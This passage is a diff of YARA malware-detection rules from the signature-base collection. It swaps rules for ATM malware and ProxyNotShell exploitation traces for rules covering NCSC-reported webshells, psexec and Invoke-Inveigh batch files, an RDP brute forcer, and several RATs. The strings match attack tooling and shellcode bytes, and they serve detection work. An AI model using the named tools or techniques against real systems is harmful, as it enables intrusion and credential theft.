 		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = "NtUserConsoleControl" ascii wide
-		$s2 = "NtCallbackReturn" ascii wide
-		$s3 = "CreateWindowEx" ascii wide
-		$s4 = "SetWindowLong" ascii wide
-		$a1 = {48 C1 E8 02 48 C1 E9 02 C7 04 8A}
-		$a2 = {66 0F 1F 44 00 00 80 3C 01 E8 74 22 FF C2 48 FF C1}
-		$a3 = {48 63 05 CC 69 05 00 8B 0D C2 69 05 00 48 C1 E0 20 48 03 C1}
+		tags = ""
+
+	strings:
+		$a2 = "e.RandomHashString"
+		$a3 = "e.Decode"
+		$a4 = "e.Decrypt"
+		$a5 = "e.HashStr"
+		$a6 = "e.FromB64"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 1 of ( $a* )
+		4 of ( $a* )
 }
-rule SIGNATURE_BASE_ATM_Malware_Javadispcash_1 : FILE
+rule SIGNATURE_BASE_Generic_Shellcode_Downloader_Specific : FILE
 {
 	meta:
-		description = "Detects ATM Malware JavaDispCash"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "7aa91719-6539-572a-8618-bfb5290a5b59"
-		date = "2019-03-28"
+		description = "Detects Doorshell from NCSC report"
+		author = "NCSC"
+		id = "ddd25add-ff84-5106-ac3c-5d5b4c1ef2a9"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1111254169623674882"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_javadipcash.yar#L1-L21"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L73-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a714571281844cfe7193b7c183b86b797ef5de5d1922eacaf45dad8d41cfc52"
+		hash = "b8bc0611a7fd321d2483a0a9a505251e15c22402e0cfdc62c0258af53ed3658a"
+		logic_hash = "9315ad03b5a28030c32fea5547db3ae421a1ebdae0b96a8a4c2f92660c41bc40"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
-		hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027"
-		hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa"
 
 	strings:
-		$CashInfo = "getNumberOfCashUnits" ascii wide
-		$Dispense = "waitforbillstaken" ascii wide
-		$Inject = "No code to inject!" ascii wide
-		$config = ".Agentcli" ascii wide
-		$log1 = "logft.log" ascii wide
-		$log2 = ".loginside" ascii wide
+		$push1 = {68 6C 6C 6F 63}
+		$push2 = {68 75 61 6C 41}
+		$push3 = {68 56 69 72 74}
+		$a = {BA 90 02 00 00 46 C1 C6 19 03 DD 2B F4 33 DE}
+		$b = {87 C0 81 F2 D1 19 89 14 C1 C8 1F FF E0}
 
 	condition:
-		uint16( 0 ) == 0x4B50 and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3C ) ) == 0x4550 ) and ( $a or $b ) and @push1 < @push2 and @push2 < @push3
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Batch_Script_To_Run_Psexec
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a61f6582-474f-5b6f-b8f5-329c0bcc4017"
-		date = "2022-12-22"
+		description = "Detects malicious batch file from NCSC report"
+		author = "NCSC"
+		id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L2-L22"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L91-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e8f5a3440f8b4b1850fddbd19f63796ad0f28178c678e9f464b7e4ab5ca944f"
-		score = 70
+		hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
+		logic_hash = "9bdaa14aa535c178914f83c12b23484162f085c6fc6041d379268546ee99f462"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		tags = ""
 
 	strings:
-		$s1 = "/owa/mastermailbox%40outlook.com/powershell" ascii wide
-		$sa1 = " 200 " ascii wide
-		$sa2 = " POST " ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$ = "Tokens=1 delims=" ascii
+		$ = "SET ws=%1" ascii
+		$ = "Checking %ws%" ascii
+		$ = "%TEMP%\\%ws%ns.txt" ascii
+		$ = "ps.exe -accepteula" ascii
 
 	condition:
-		all of ( $s* ) and not 1 of ( $fp* )
+		3 of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_2 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Batch_Powershell_Invoke_Inveigh
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
-		author = "Florian Roth (Nextron Systems)"
-		id = "85722997-fd28-51cf-817e-7a314e284b0b"
-		date = "2022-12-22"
+		description = "Detects malicious batch file from NCSC report"
+		author = "NCSC"
+		id = "c5dab029-6515-5d58-9ccd-bf438ba692d5"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L24-L45"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L109-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73ce86b7a673719c916666fa06963b774edad5b2cd804994614afd83ea75ecef"
-		score = 60
-		quality = 60
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		hash = "0a6b1b29496d4514f6485e78680ec4cd0296ef4d21862d8bf363900a4f8e3fd2"
+		logic_hash = "5048a180df301707622e9ad0b949da9e39d2f55f16fc43e7344a8181596a836c"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$sr1 = / \/owa\/[^\/\s]{1,30}(%40|@)[^\/\s\.]{1,30}\.[^\/\s]{2,3}\/powershell / ascii wide
-		$sa1 = " 200 " ascii wide
-		$sa2 = " POST " ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$ = "Inveigh.ps1" ascii
+		$ = "Invoke-Inveigh" ascii
+		$ = "-LLMNR N -HTTP N -FileOutput Y" ascii
+		$ = "powershell.exe" ascii
 
 	condition:
-		all of ( $s* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_3 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_Lnk_Detect : FILE
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
-		author = "Florian Roth (Nextron Systems)"
-		id = "76dd786e-daaa-5cd9-8e3e-50d9eab7f9d2"
-		date = "2022-12-22"
+		description = "Detects malicious LNK file from NCSC report"
+		author = "NCSC"
+		id = "76d382f3-b2f2-5ede-94b2-5ae8b766c194"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L47-L66"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L126-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "607d3743a46e0c5000b9c7847dd89f5d7ccf29f4f1af9bce6870d7738f071f5c"
-		score = 60
+		logic_hash = "ae8796877d70f8ddd56bac8ed474231f26d9bc8e73625e65d5d927ab804996b3"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		tags = "FILE"
 
 	strings:
-		$sa1 = " POST /powershell - 444 " ascii wide
-		$sa2 = " POST /Powershell - 444 " ascii wide
-		$sb1 = " - 200 0 0 2" ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$lnk_magic = {4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46}
+		$lnk_target = {41 00 55 00 54 00 4F 00 45 00 58 00 45 00 43 00 2E 00 42 00 41 00 54}
+		$s1 = {5C 00 5C 00 31 00}
+		$s2 = {5C 00 5C 00 32 00}
+		$s3 = {5C 00 5C 00 33 00}
+		$s4 = {5C 00 5C 00 34 00}
+		$s5 = {5C 00 5C 00 35 00}
+		$s6 = {5C 00 5C 00 36 00}
+		$s7 = {5C 00 5C 00 37 00}
+		$s8 = {5C 00 5C 00 38 00}
+		$s9 = {5C 00 5C 00 39 00}
 
 	condition:
-		1 of ( $sa* ) and $sb1 and not 1 of ( $fp* )
+		uint32be( 0 ) == 0x4c000000 and uint32be( 4 ) == 0x01140200 and ( ( $lnk_magic at 0 ) and $lnk_target ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_RDP_Brute_Strings
 {
 	meta:
-		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5af3ae70-8897-593f-a413-82ca1d1ba961"
-		date = "2022-12-22"
-		modified = "2023-01-26"
-		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L68-L86"
+		description = "Detects RDP brute forcer from NCSC report"
+		author = "NCSC"
+		id = "d6f0cdbc-a910-5826-b25a-61c2924f8e2a"
+		date = "2018-04-06"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L151-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f2aac61bc17f74901ec8d638d5cfaaa45bbd2a4e40e5d915bf2a946daed411d2"
-		score = 70
+		hash = "8234bf8a1b53efd2a452780a69666d1aedcec9eb1bb714769283ccc2c2bdcc65"
+		logic_hash = "80c51d82a57271409d298b5175505c4234a6c3ec8a8763c93b669d1f0a8d59ba"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
+		tags = ""
 
 	strings:
-		$re1 = /,\/[Pp][Oo][Ww][Ee][Rr][Ss][Hh][Ee][Ll][Ll][^\n]{0,50},Kerberos,true,[^\n]{0,50},200,0,,,,[^\n]{0,2000};OnEndRequest\.End\.ContentType=application\/soap\+xml charset UTF-8;S:ServiceCommonMetadata\.HttpMethod=POST;/ ascii wide
-		$fp1 = "ClientInfo" ascii wide fullword
-		$fp2 = "Microsoft WinRM Client" ascii wide fullword
-		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
+		$ = "RDP Brute" ascii wide
+		$ = "RdpChecker" ascii
+		$ = "RdpBrute" ascii
+		$ = "Brute_Count_Password" ascii
+		$ = "BruteIPList" ascii
+		$ = "Chilkat_Socket_Key" ascii
+		$ = "Brute_Sync_Stat" ascii
+		$ = "(Error! Hyperlink reference not valid.)" wide
+		$ = "BadRDP" wide
+		$ = "GoodRDP" wide
+		$ = "@echo off{0}:loop{0}del {1}{0}if exist {1} goto loop{0}del {2}{0}del \"{2}\"" wide
+		$ = "Coded by z668" wide
 
 	condition:
-		$re1 and not 1 of ( $fp* )
+		4 of them
 }
-rule SIGNATURE_BASE_Rtf_CVE_2018_0802 : CVE_2018_0802 FILE
+rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_1
 {
 	meta:
-		description = "Attempts to exploit CVE-2018-0802"
-		author = "Rich Warren"
-		id = "162492a3-d792-5f1c-a143-191c62b54728"
-		date = "2023-12-05"
+		description = "Detects Z Webshell from NCSC report"
+		author = "NCSC"
+		id = "f4b50760-bd3a-5e1f-bf32-50f16a42c381"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "http://www.freebuf.com/vuls/159789.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2018_0802.yar#L2-L14"
+		old_rule_name = "Z_WebShell"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L176-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ac1cd4f2162d2c8415e2ee5167cabb8e8aff08a06afe244f5bfe099f2d3fbeb4"
+		hash = "ace12552f3a980f1eed4cadb02afe1bfb851cafc8e58fb130e1329719a07dbf0"
+		logic_hash = "1dfc546a7493c1443527ebe74ed8cd2b06ee032b9a3f736b830e16288e616d43"
 		score = 75
-		quality = 58
-		tags = "CVE-2018-0802, FILE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
-		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{308,310}2500/ ascii nocase
+		$ = "Z_PostBackJS" ascii wide
+		$ = "z_file_download" ascii wide
+		$ = "z_WebShell" ascii wide
+		$ = "1367948c7859d6533226042549228228" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A1 : FILE
+rule SIGNATURE_BASE_Bluenoroffpos_DLL
 {
 	meta:
-		description = "Detects suspicious sample with PowerShell content "
-		author = "Florian Roth (Nextron Systems)"
-		id = "1699f153-f972-5e06-a94b-eb95af637e6b"
-		date = "2017-07-27"
+		description = "Bluenoroff POS malware - hkp.dll"
+		author = "Florian Roth"
+		id = "d2b34b50-c7eb-5852-ba5d-734dd5038c2e"
+		date = "2018-06-07"
 		modified = "2023-12-05"
-		reference = "PowerShell Empire Eval"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps_empire_eval.yar#L11-L25"
+		reference = "http://blog.trex.re.kr/3?category=737685"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bluenoroff_pos.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e77ff4e216601c62a049569a6ea1aae13fc2612b480f4d7fad4e99dc72155da3"
-		score = 65
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4d10e80c7c80ef040efc680424a429558c7d76a965685bbc295908cb71137eba"
+		logic_hash = "39f23045b3e5ef60c199091b7f01ac2a3a31bcb95219aebb9a4cfd0764886f19"
+		score = 75
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "powershell" wide
-		$s2 = "pshcmd" fullword ascii
+		$dll = "ksnetadsl.dll" ascii wide fullword nocase
+		$exe = "xplatform.exe" ascii wide fullword nocase
+		$agent = "Nimo Software HTTP Retriever 1.0" ascii wide nocase
+		$log_file = "c:\\windows\\temp\\log.tmp" ascii wide nocase
+		$base_addr = "%d-BaseAddr:0x%x" ascii wide nocase
+		$func_addr = "%d-FuncAddr:0x%x" ascii wide nocase
+		$HF_S = "HF-S(%d)" ascii wide
+		$HF_T = "HF-T(%d)" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+		5 of them
 }
-rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A2 : FILE
+rule SIGNATURE_BASE_APT_MAL_Fujinama : FILE
 {
 	meta:
-		description = "Detects suspicious sample with PowerShell content "
-		author = "Florian Roth (Nextron Systems)"
-		id = "8f299fcd-156c-5ce1-8582-c2a4ff2c0cfc"
-		date = "2017-07-27"
+		description = "Fujinama RAT used by Leonardo SpA Insider Threat"
+		author = "ReaQta Threat Intelligence Team"
+		id = "b10b1e45-aa6c-53fa-8e02-7a325c3e12fb"
+		date = "2021-01-07"
 		modified = "2023-12-05"
-		reference = "PowerShell Empire Eval"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps_empire_eval.yar#L27-L41"
+		reference = "https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fujinama_rat.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "28f320e721a61d7e2db39830652038eb4090429d73162888570a97b0bc1504d8"
-		score = 65
-		quality = 85
+		logic_hash = "9bff8ee5424a939b5278b2d1b349d898d138b9efb3cf783221826abb4d8015ef"
+		score = 75
+		quality = 51
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e14c139159c23fdc18969afe57ec062e4d3c28dd42a20bed8ddde37ab4351a51"
+		version = "1"
 
 	strings:
-		$x1 = "\\support\\Release\\ab.pdb" ascii
-		$s2 = "powershell.exe" ascii fullword
+		$kaylog_1 = "SELECT" wide ascii nocase
+		$kaylog_2 = "RIGHT" wide ascii nocase
+		$kaylog_3 = "HELP" wide ascii nocase
+		$kaylog_4 = "WINDOWS" wide ascii nocase
+		$computername = "computername" wide ascii nocase
+		$useragent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" wide ascii nocase
+		$pattern = "'()*+,G-./0123456789:" wide ascii nocase
+		$function_1 = "t_save" wide ascii nocase
+		$cftmon = "cftmon" wide ascii nocase
+		$font = "Tahoma" wide ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Exploit_MS15_077_078 : FILE
+rule SIGNATURE_BASE_Uboatrat : FILE
 {
 	meta:
-		description = "MS15-078 / MS15-077 exploit - generic signature"
+		description = "Detects UBoat RAT Samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "57f6db11-9d93-53fd-ab68-c6c3eadae2da"
-		date = "2015-07-21"
+		id = "f7f745c2-648d-5937-8d06-f5d1b6ed7e11"
+		date = "2017-11-29"
 		modified = "2023-12-05"
-		reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_2426.yar#L10-L36"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uboat_rat.yar#L9-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "354219a1ed88c891c64513a057266199919406309460d92792a4be509f9580a1"
+		logic_hash = "3d0837607d1a5efd9986eccf98f108633502a09dbf8c4c94fc0f0247060bc3a8"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"
-		hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"
-		hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
-		hash4 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
+		hash1 = "04873dbd63279228a0a4bb1184933b64adb880e874bd3d14078161d06e232c9b"
+		hash2 = "7b32f401e2ad577e8398b2975ecb5c5ce68c5b07717b1e0d762f90a6fbd8add1"
+		hash3 = "42d8a84cd49ff3afacf3d549fbab1fa80d5eda0c8625938b6d32e18004b0edac"
+		hash4 = "6bea49e4260f083ed6b73e100550ecd22300806071f4a6326e0544272a84526c"
+		hash5 = "cf832f32b8d27cf9911031910621c21bd3c20e71cc062716923304dacf4dadb7"
+		hash6 = "bf7c6e911f14a1f8679c9b0c2b183d74d5accd559e17297adcd173d76755e271"
 
 	strings:
-		$s1 = "GDI32.DLL" fullword ascii
-		$s2 = "atmfd.dll" fullword wide
-		$s3 = "AddFontMemResourceEx" fullword ascii
-		$s4 = "NamedEscape" fullword ascii
-		$s5 = "CreateBitmap" fullword ascii
-		$s6 = "DeleteObject" fullword ascii
-		$op0 = { 83 45 e8 01 eb 07 c7 45 e8 }
-		$op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 }
-		$op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 }
-		$op3 = { 64 00 88 ff 84 03 70 03 }
+		$s1 = "URLDownloadToFileA" ascii
+		$s2 = "GetModuleFileNameW" ascii
+		$s4 = "WININET.dll" ascii
+		$s5 = "urlmon.dll" ascii
+		$s6 = "WTSAPI32.dll" ascii
+		$s7 = "IPHLPAPI.DLL" ascii
+		$op1 = { 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
+               69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
+               74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
+               6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 }
+		$vprotect = { 2E 76 6D 70 30 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or 3 of ( $op* )
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 1400KB and filesize > 800KB and ( all of ( $s* ) and $op1 at 64 and uint16( uint32( 0x3c ) + 11 ) == 0x59 and $vprotect in ( 600 .. 700 ) )
 }
-rule SIGNATURE_BASE_Exploit_MS15_077_078_Hackingteam : FILE
+rule SIGNATURE_BASE_Uboatrat_Dropper : FILE
 {
 	meta:
-		description = "MS15-078 / MS15-077 exploit - Hacking Team code"
+		description = "Detects UBoatRAT Dropper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3bf40dec-c46e-5054-a98e-602049cb1824"
-		date = "2015-07-21"
+		id = "f3d4e333-1282-5f6e-9294-628a8230d2a5"
+		date = "2017-11-29"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_2426.yar#L38-L57"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uboat_rat.yar#L52-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c94582629e555c9fd0b29302720078a7eb47d3013d0c1b5edd4e060c2062fa92"
+		logic_hash = "6f8dcc8559fa0ab1644ef6bab9bc875f3d62391c157b373e0355ad03d35e5601"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
-		hash2 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
+		hash1 = "f4c659238ffab95e87894d2c556f887774dce2431e8cb87f881df4e4d26253a3"
 
 	strings:
-		$s1 = "\\SystemRoot\\system32\\CI.dll" ascii
-		$s2 = "\\sysnative\\CI.dll" ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" fullword ascii
-		$s4 = "CRTDLL.DLL" fullword ascii
-		$s5 = "\\sysnative" ascii
-		$s6 = "InternetOpenA coolio, trying open %s" fullword ascii
+		$s1 = "GetCurrenvackageId" fullword ascii
+		$s2 = "fghijklmnopq" fullword ascii
+		$s3 = "23456789:;<=>?@ABCDEFGHIJKLMNOPQ" fullword ascii
+		$s4 = "PMM/dd/y" fullword ascii
+		$s5 = "bad all" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 5 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Sofacy_Malware_Strangespaces : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Byteencoder_Jan25 : FILE
 {
 	meta:
-		description = "Detetcs strange strings from Sofacy malware with many spaces"
-		author = "Florian Roth (Nextron Systems)"
-		id = "60f99b88-f256-5289-852c-c0bf27f1cbd4"
-		date = "2015-12-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L8-L23"
+		description = "Detects Linux binaries that encode bytes by splitting them into upper and lower nibbles and mapping them to custom lookup tables, seen being used by SEASPY and Bluez backdoors"
+		author = "MalGamy (Nextron System)"
+		id = "4866348a-2129-5f6a-9498-8ab1acfa74b4"
+		date = "2025-01-23"
+		modified = "2025-03-20"
+		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/seaspy_backdoor_jan25.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee8bbebaa0978d038424cee3775ba312476afa014ce0d57c73d6844f758116ca"
+		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
+		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
+		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
+		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
+		hash = "b0b83e1c69aa8df6da4383230bef1ef46e09f3bf26cec877eac53a9d48dc53ca"
+		hash = "d21b40645e33638bd36b63582c2c6ad5e8230c731236a54e8e5f4139bad31fdf"
+		logic_hash = "c0fe841681d3aaa8687c95f475f68b2d8b2f26afe42e9d15c601602fcc5e50cb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Delete Temp Folder Service                                  " fullword wide
-		$s3 = " Operating System                        " fullword wide
-		$s4 = "Microsoft Corporation                                       " fullword wide
